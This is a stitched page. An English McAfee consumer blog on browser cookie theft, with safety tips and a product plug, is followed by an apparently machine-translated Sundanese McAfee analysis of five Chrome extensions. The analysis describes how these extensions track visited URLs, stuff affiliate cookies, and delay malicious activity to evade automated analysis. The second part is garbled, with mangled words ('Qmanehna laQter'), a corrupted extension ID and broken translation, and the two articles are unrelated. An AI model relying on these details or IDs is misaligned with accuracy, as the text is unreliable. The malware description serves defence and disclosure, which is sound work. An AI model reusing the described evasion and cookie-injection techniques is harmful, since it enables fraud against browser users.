Chocolate chip, oatmeal raisin, snickerdoodle: Cybercriminals have a sweet tooth just like you. But their favorite type of cookie is of the browser variety.

Browser cookies – often just referred to as cookies – track your comings and goings on websites. And when a cyber thief gets their mitts on your browser cookies, it can open all kinds of doors into your online accounts.

The first step to protecting your devices and online privacy from criminals is to understand their schemes. Here are the key terms you need to know about cookie theft plus how to keep malicious software off your devices.

Key Cookie Theft Terms You Should Know

Cookie theft can happen to anyone. Knowing the basics of this cyberscheme may help you better protect your online life:

  • Browser cookie. A small collection of data your internet browser stores every time you visit a website. When your browser stores this data, it makes it quicker for you to log back into a website or for a website to customize its suggestions for you the next time you visit.
  • Cache. Like a mouse scurrying away a pile of sweet treats, your device hoards – or caches – all the cookies you gather from websites you visit. Your cache of cookies will grow continually until you clear it out. If your cache grows too large, it could slow down your device, affect performance, or tax your battery power.
  • Multifactor authentication. MFA is a way to log in to an online account that requires additional forms of identification beyond a username and password. It could require biometric identification (like a face or fingerprint scan), a security question, or a one-time code.

How and Why Do Criminals Steal Browser Cookies?

Cookies thieves are generally motivated by the financial gains of breaking into people’s online accounts. Banking, social media, and online shopping accounts are full of valuable personal and financial details that a cybercriminal can either sell on the dark web or use to impersonate you and steal your identity.

Malware is generally the vehicle cybercriminals use to steal cookies. Once the malicious software gets onto a device, the malware is trained to copy a new cookie’s data and send it to the cybercriminal. Then, from their own machine, the cybercriminal can input that data and start a new session with the target’s stolen data.

There was a stretch of a few years where cookie thieves targeted high-profile YouTube influencers with malware spread through fake collaboration deals and crypto scams. The criminals’ goal was to steal cookies to sneak into the backend of the YouTube accounts to change passwords, recovery emails and phone numbers, and bypass two-factor authentication to lock the influencers out of their accounts.1

But you don’t have to have a valuable social media account to draw the eye of a cybercriminal. “Operation Cookie Monster” dismantled an online forum that sold stolen login information for millions of online accounts gained through cookie theft.2

Best Practices for Secure Browsing

To keep your internet cookies out of the hands of criminals, it’s essential to practice safe browsing habits. These four tips will go a long way toward keeping your accounts out of the reach of cookie thieves and your devices free from malicious software.

  1. Set up MFA. MFA may seem like it’ll slow down your login process, but really, the extra seconds it takes are well worth it. Most people have their phone within arm’s reach throughout the day, so a texted, emailed, or authentication app-generated code is easy enough to access. Just remember that a reputable company will never ask you for one-time codes, so these codes are for your eyes only. MFA makes it extremely difficult for a criminal to log into your accounts, even when they have your password and username. Without the unique code, a bad actor is locked out.
  2. Watch out for phishing attempts and risky websites. Cookie-stealing malware often hops onto innocent devices through either phishing lures or through visiting untrustworthy sites. Make sure to carefully read every text, email, and social media direct message. With the help of AI content generation tools like ChatGPT, phishers’ messages are more believable than they were years ago. Be especially diligent about clicking on links that may take you to risky sites or download malicious files onto your device.
  3. Clear your cache regularly. Make it a habit to clear your cache and browsing history often. This is a great practice to optimize the performance of your device. Plus, in the case that a cybercriminal does install cookie-stealing malware on your device, if you store hardly any cookies on your device, the thief will have little valuable information to pilfer.
  4. Use a password manager. While a password manager won’t protect your device from cookie-stealing malware, it will lessen your dependence upon storing valuable cookies. It’s convenient to already have your usernames and passwords auto-populate; however, if your device falls into the wrong hands these shortcuts could spell trouble for your privacy. A password manager is a vault for all your login information for your dozens of online accounts. All you need to do is input one master password, and from there, the password manager will autofill your logins. It’s just as quick and convenient, but infinitely more secure.

Lock Up Your Cookie Jar

McAfee+ is an excellent partner to help you secure your devices and digital life. McAfee+ includes a safe browsing tool to alert you to suspicious websites, a password manager, identity monitoring, and more.

The next time you enjoy a cookie, spare a moment to think of cookies of the digital flavor: clear your cache if you haven’t in awhile, doublecheck your devices and online accounts for suspicious activity, and savor the sweetness of your digital privacy!

1The Hacker News, “Hackers Stealing Browser Cookies to Hijack High-Profile YouTube Accounts”

2CNN, “‘Operation Cookie Monster:’ FBI seizes popular cybercrime forum used for large-scale identity theft”

Introducing McAfee+

Identity theft protection and privacy for your digital life

#Cookie #Theft #Cybercriminals #Accounts

Ditulis ku Oliver Devane sareng Vallabh Chole

Pembaruan 9 Séptémber 2022: Kusabab publikasi asli blog ieu dina 29 Agustus 2022, ekstensi browser Flipshope diapdet dina Chrome Store dina 6 Séptémber 2022 kalayan versi anu henteu ngandung fitur anu berpotensi ngabahayakeun anu tadina dibahas dina blog ieu.

Update 30 Séptémber 2022: Kusabab publikasi asli blog ieu dina 29 Agustus 2022, ekstensi browser AutoBuy diropéa dina Chrome Store dina 17 Séptémber 2022 kalawan versi nu euweuh ngandung fitur berpotensi ngabahayakeun asalna dibahas dina blog ieu.

Sababaraha bulan kapengker, urang blogging ngeunaan ekstensi jahat anu alihan pamaké ka situs phishing jeung nyelapkeun ID affiliate kana cookies situs eCommerce. Ti saprak éta, kami parantos nalungtik sababaraha ekstensi jahat anu sanés sareng mendakan 5 kalayan jumlah pamasangan langkung ti 1,400,000.

Ekstensi nawiskeun rupa-rupa fungsiS siga ngamungkinkeun pamaké pikeun lalajo acara Netflix babarengankupon ramatloka, Jeung nyandak screenshot tina ramatloka a. Qmanehna laQter borrows sababaraha frasa tina extension populér sejen disebut GoFullPage

Salian nawiskeun fungsionalitas anu dimaksud, ekstensi ogé ngalacak kagiatan browsing pangguna. Unggal halaman wéb anu dilongok dikirim ka server anu dipiboga ku panyipta extension. Aranjeunna ngalakukeun ieu supados aranjeunna tiasa ngalebetkeun kodeu kana situs wéb eCommerce anu aranjeunna kunjungan. Aksi ieu ngarobih cookies dina situs supados panyipta ekstensi nampi bayaran afiliasi pikeun unggal barang anu dibeli.

Pamaké ekstensi henteu sadar kana fungsi ieu sareng résiko privasi unggal situs anu dilongok dikirim ka server panyusun extension.

5 ekstensi nyaeta

Ngaran ID extension Pamaké
pihak Netflix mmnbenehknlpbendgmgngeaignppnbe 800.000

Pesta Netflix 2

flijfnhifgdcbhglkneplegafminjnhn 300.000

FlipShope – Extension Tracker Harga

sisterhbfjdbjkhelbdnffogkobkekkkej 80.000

Potret Kaca Pinuh – Potret layar

pojgkmkfincpdkdgjepkmdekcahmckjp 200.000
AutoBuy Flash Penjualan gbnahglfafmhaehbdmjedfhdmimjcbed 20.000

Analisis Téknis

Bagian ieu ngandung analisa téknis ngeunaan extension chrome bahaya ‘mmnbenehknklpbendgmgngeaignppnbe’. Sadaya 5 ekstensi ngalakukeun paripolah anu sami.

Manifest. json

Manifest.json netepkeun halaman latar salaku bg.html. Berkas HTML ieu ngamuat b0.js sareng tanggung jawab pikeun ngirim URL anu didatangan sareng kode nyuntik kana situs eCommerce.

B0. js

Aksara b0.js ngandung loba fungsi. Blog ieu bakal difokuskeun fungsi anu tanggung jawab pikeun ngirim URL anu didatangan ka server sareng ngolah réspon.

Ekstensi Chrome tiasa dianggo ku ngalanggan acara anu teras dianggo salaku pemicu pikeun ngalakukeun kagiatan anu tangtu. Ekstensi anu dianalisis ngalanggan acara anu asalna tina chrome.tabs.onUpdated. chrome.tabs.onUpdated bakal seuneu lamun pamaké muka URL anyar dina tab.

Sakali acara ieu dipicu, extension nu susunan variabel disebut curl jeung URL tab ku ngagunakeun variabel tab.url. Éta nyiptakeun sababaraha variabel sanés anu teras dikirimkeun Data POST dina format ieu:

Variabel Émbaran
rujukan URL rujukan disandi Base64
Daérah kacamatan paranti
Kota Kota alat
Sleting Kode pos alat
Apisend A ID acak dihasilkeun pikeun pamaké.
Ngaran URL disandi Base64 keur dilongok
ext_name Ngaran extension Chrome

A ID acak dihasilkeun ku milih 8 karakter acak dina susunan karakter. Kodeu ditémbongkeun di handap:

Nagara, kota, jeung zip nyaeta dikumpulkeun maké Kodeu ditémbongkeun di handap:

Saatos nampi URL, bakal pariksa naha éta cocog sareng daptar ramatloka nu boga ID affiliate na, Jeung Lamun nuhun, eta bakal ngabales requests. Hiji conto dipidangkeun di handap:

Data anu dipulangkeun aya dina format JSON. Anu respon dipariksa ngagunakeun fungsi di handap sarta bakal nelepon fungsi salajengna gumantung kana naon jawabanana.

Dua fungsi ieu diwincik di handap:

Hasilna[‘c’] – passf_url

Upami hasilna ‘c’ sapertos anu aya dina blog ieu, ekstensi bakal naroskeun URL anu dipulangkeun. Éta teras bakal mariksa réspon sareng upami statusna 200 atanapi 404 éta bakal mariksa upami pamundut diréspon ku URL. Upami enya, éta bakal kalebet URL anu ditampi tina server salaku Iframe dina halaman wéb anu ayeuna dilongok.

Hasilna[‘e’] setCookies

Upami hasilna nyaéta ‘e’, ​​​​ekstensi bakal nyelapkeun hasilna salaku cookie. Kami henteu tiasa mendakan réspon ‘e’ salami analisa kami, tapi ieu ngamungkinkeun pangarang pikeun nambihan cookie naon waé kana halaman wéb naon waé sabab ekstensina ngagaduhan idin ‘cookie’ anu leres.

Aliran paripolah

Gambar di handap nembongkeun aliran hambalan-demi-hambalan kajadian nalika napigasi ka ramatloka BestBuy.

  1. Pamaké napigasi ka sareng ekstensi masangkeun URL ieu dina format Base64 ka
  2. ngabales ku “c” sareng URL. “C” hartina extension bakal nelepon fungsi passf_url ().
  3. passf_url () bakal nyieun pamundut ngalawan URL
  4. URL anu ditaroskeun dina léngkah 3 dialihkeun nganggo réspon 301 ka sareng ID afiliasi anu aya hubunganana sareng anu gaduh Extension
  5. Ekstensi bakal ngalebetkeun URL salaku Iframe dina situs anu didatangan ku pangguna
  6. Mintonkeun set Cookies pikeun ID Affiliate pakait sareng nu boga Extension. Aranjeunna ayeuna bakal nampi komisi pikeun unggal pameseran anu dilakukeun dina

Ieu pidéo tina acara éta

Waktu reureuh pikeun ngahindarkeun analisa otomatis

Kami mendakan trik anu pikaresepeun dina sababaraha ekstensi anu bakal nyegah kagiatan jahat diidentifikasi dina lingkungan analisis otomatis. Éta kalebet cek waktos sateuacan aranjeunna ngalakukeun kagiatan jahat. Hal ieu dilakukeun ku mariksa upami tanggal ayeuna > 15 dinten ti saprak instalasi.


Blog ieu nyorot résiko masang ekstensi, bahkan anu gaduh dasar pamasangan anu ageung sabab masih tiasa ngandung kode jahat.

McAfee mamatahan para nasabahna pikeun ati-ati nalika masang ekstensi Chrome sareng nengetan idin anu dipénta.

Idin bakal ditingalikeun ku Chrome sateuacan pamasangan ekstensi. Konsumén kedah nyandak léngkah-léngkah tambahan pikeun marios kaaslian upami ekstensi naroskeun idin anu ngamungkinkeun éta dijalankeun dina unggal halaman wéb anu anjeun kunjungi sakumaha anu lengkep dina blog ieu.

Konsumén McAfee ditangtayungan tina situs jahat anu diwincik dina blog ieu kusabab diblokir ku McAfee WebAdvisorsakumaha ditémbongkeun di handap.

Kode jahat dina ekstensi dideteksi salaku JTI/Tersangka. Mangga laksanakeun scan ‘Full’ produk.

Tipe Tandaan produk dideteksi
Ekstensi Chrome Partéi Netflix – mmnbenehknklpbendgmgeaignppnbe Total Protection na LiveSafe JTI/Tersangka
Ekstensi Chrome FlipShope – Extension Tracker Harga – Vérsi – adikhbfjdbjkhelbdnffogkobkekkkej Total Protection na LiveSafe JTI/Tersangka
Ekstensi Chrome Screenshot Kaca Pinuh


Total Protection na LiveSafe JTI/Tersangka
Ekstensi Chrome Partéi Netflix 2 – flijfnhifgdcbhglkneplegafminjnhn Total Protection na LiveSafe JTI/Tersangka
Ekstensi Chrome AutoBuy Flash Sale gbnahglfafmhaehbdmjedfhdmimjcbed Total Protection na LiveSafe JTI/Tersangka
URL McAfee WebAdvisor Diblokir
URL McAfee WebAdvisor Diblokir
URL McAfee WebAdvisor Diblokir
URL McAfee WebAdvisor Diblokir
URL Unscart. di McAfee WebAdvisor Diblokir
URL autobuyapp. com McAfee WebAdvisor Diblokir

#Ékstensi #Chrome #Eusi #Cookie #Berbahaya #sareng #Juta #Pamaké